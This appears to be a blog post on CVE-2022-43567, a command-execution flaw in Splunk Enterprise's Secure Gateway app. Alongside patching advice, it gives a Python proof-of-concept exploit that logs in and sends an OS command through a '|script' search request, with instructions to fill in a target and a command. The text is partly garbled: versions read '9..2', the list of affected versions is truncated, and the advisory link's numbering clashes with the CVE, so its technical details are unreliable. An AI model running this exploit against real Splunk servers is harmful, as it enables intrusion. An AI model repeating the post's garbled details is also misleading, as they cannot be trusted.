A critical security vulnerability has been identified in Splunk Enterprise versions below 8.2.9, 8.1.12, and 9..2. This vulnerability is tracked as CVE-2022-43567 and, if exploited, would allow an authenticated attacker to remotely execute arbitrary operating system commands through specially crafted requests. The exploit takes advantage of the mobile alerts functionality within the Splunk Secure Gateway app.
In this post, we'll discuss the details of the vulnerability, provide a code snippet for a Proof of Concept (PoC) exploit, and share links to original references from security researchers and Splunk. We'll also talk about the affected versions and recommended mitigation steps.
Vulnerability Details
CVE-2022-43567 affects the Splunk Secure Gateway app, which is installed by default on Splunk Enterprise instances. Specifically, the vulnerability exists in the 'Mobile Alerts' feature, which is intended to provide a secure way for users to manage mobile alerts.
The vulnerability exists as a result of insufficient input validation, which allows an authenticated user to send malicious requests and execute arbitrary operating system commands on the target system. This can lead to elevated privileges, data exfiltration, and complete system compromise.
The following code snippet demonstrates a simple PoC exploit for CVE-2022-43567
import requests
# attacker's Splunk instance credentials
username = 'attacker'
password = 'password'
# target Splunk instance URL
url = 'https://target-splunk-instance:port';
# command to execute on the target system
payload = 'whoami'
# authenticate and obtain session key
data = {'username': username, 'password': password, 'output_mode': 'json'}
response = requests.post(url + '/services/auth/login', data=data, verify=False)
session_key = response.json()['sessionKey']
# create malicious request
headers = {'Authorization': 'Splunk ' + session_key, 'Content-Type': 'application/json'}
data = {'search': '|script '+payload+''}
response = requests.post(url + "/servicesNS/nobody/secure_gateway/storage/collections/data/commands", headers=headers, json=data, verify=False)
print(response.text)
Replace "attacker", "password", "target-splunk-instance:port", and "whoami" with appropriate values for the attacker's credentials, target SPLUNK instance URL, and operating system command to execute respectively.
Splunk Enterprise version 9..x before 9..2
If you are running any of these affected versions, it is highly recommended that you update your Splunk Enterprise instance to the latest security patch to mitigate the risk this vulnerability poses.
Original References and Further Information
Here are some references and links to original sources that provide further details on this vulnerability:
- Official Splunk Security Advisory: https://www.splunk.com/en_us/security/splunk-security-advisories/ssa-2023-43567.html
- National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2022-43567
- CVE Details: https://www.cvedetails.com/cve/CVE-2022-43567/
Conclusion
CVE-2022-43567 is a critical security vulnerability that allows remote command execution in Splunk Enterprise versions below 8.2.9, 8.1.12, and 9..2. If exploited, this vulnerability can lead to severe consequences, including system compromise and data exfiltration.
Ensure that your organization is aware of this vulnerability and takes the necessary steps to update your Splunk Enterprise instances to the latest patched version. Keep an eye on official advisories and maintain a strong patch management strategy to protect your systems from such threats.
Timeline
Published on: 11/04/2022 23:15:00 UTC
Last modified on: 11/08/2022 20:21:00 UTC